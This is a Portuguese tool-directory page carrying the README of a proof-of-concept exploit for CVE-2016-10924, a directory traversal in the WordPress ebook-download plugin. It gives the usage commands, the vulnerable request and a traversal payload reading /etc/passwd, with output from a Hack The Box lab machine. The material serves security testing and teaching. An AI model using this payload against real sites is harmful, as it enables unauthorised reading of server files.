Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2016-10924-POC — Script de exploit de Prova de Conceito (PoC) para a vulnerabilidade de Directory Traversal (CVE-2016-10924) encontrada no plugin ebook-download do WordPress (versões < 1.2). Essa vulnerabilidade permite leituras não autorizadas de arquivos por meio de uma solicitação GET forjada. | Kitploit
Ferramentas/GitHubGitHub/alealeluyah/cve-2016-10924-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubalealeluyah/cve-2016-10924-poc

cve-2016-10924-POC

Script de exploit de Prova de Conceito (PoC) para a vulnerabilidade de Directory Traversal (CVE-2016-10924) encontrada no plugin ebook-download do WordPress (versões < 1.2). Essa vulnerabilidade permite leituras não autorizadas de arquivos por meio de uma solicitação GET forjada.

Ver Repositório
12há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2016-10924-POC

Este repositório contém um script de exploit Prova de Conceito (PoC) para a vulnerabilidade Directory Traversal (CVE-2016-10924) encontrada no plugin ebook-download do WordPress (versões < 1.2).

Essa vulnerabilidade permite leitura não autorizada de arquivos por meio de uma solicitação GET especialmente elaborada. O exploit utiliza um parâmetro chamado ebookdownloadurl para percorrer diretórios no servidor de destino.

Descrição

  • CVE-ID: CVE-2016-10924
  • Tipo de Vulnerabilidade: Directory Traversal
  • Componente Afetado: plugin ebook-download < 1.2 para WordPress
  • Impacto: Atacantes remotos podem ler arquivos arbitrários no sistema operacional subjacente, como /etc/passwd, manipulando o caminho do arquivo no parâmetro ebookdownloadurl.

Nota: Este PoC é apenas para fins educacionais e de teste autorizado. O uso indevido dessas informações pode acarretar consequências legais.

Requisitos

  • Python 3.
  • biblioteca requests (instale via pip install requests)

Uso

  1. Clone o repositório:

    git clone https://github.com/your-user/CVE-2016-10924-POC.git
    cd CVE-2016-10924-POC
    
  2. Instale as Dependências:

    pip install requests
    
  3. Execute o Exploit:

    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
    
  4. Especifique o caminho do arquivo a ser lido: Após executar o script, você será solicitado a informar um caminho de arquivo. Por exemplo:

    ../../../../../../../../../etc/passwd
    

    Talvez seja necessário ajustar o número de ../ com base na localização do webroot no ambiente de destino.

  5. Sair:

    • Digite exit, quit ou pressione Enter em um prompt vazio para sair.
    • Pressione Ctrl + C para interromper o script imediatamente.

Exemplo

Eu usei este exploit na máquina "Backdoor", uma máquina aposentada do Hack The Box:

$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.

Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...

Aviso Legal

Este projeto destina-se exclusivamente a fins educacionais e de teste de segurança legítimo.
Não use as informações ou scripts deste repositório em qualquer sistema para o qual você não tenha permissão explícita para testar.
O autor e os colaboradores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.

Licença

Este projeto está licenciado sob a GNU 2.0 License. Sinta-se à vontade para usá-lo e modificá-lo, mas dê os devidos créditos.


Referências

  • NVD - CVE-2016-10924
  • WordPress Plugin ebook-download (para referência de versões vulneráveis)
Baixar ferramenta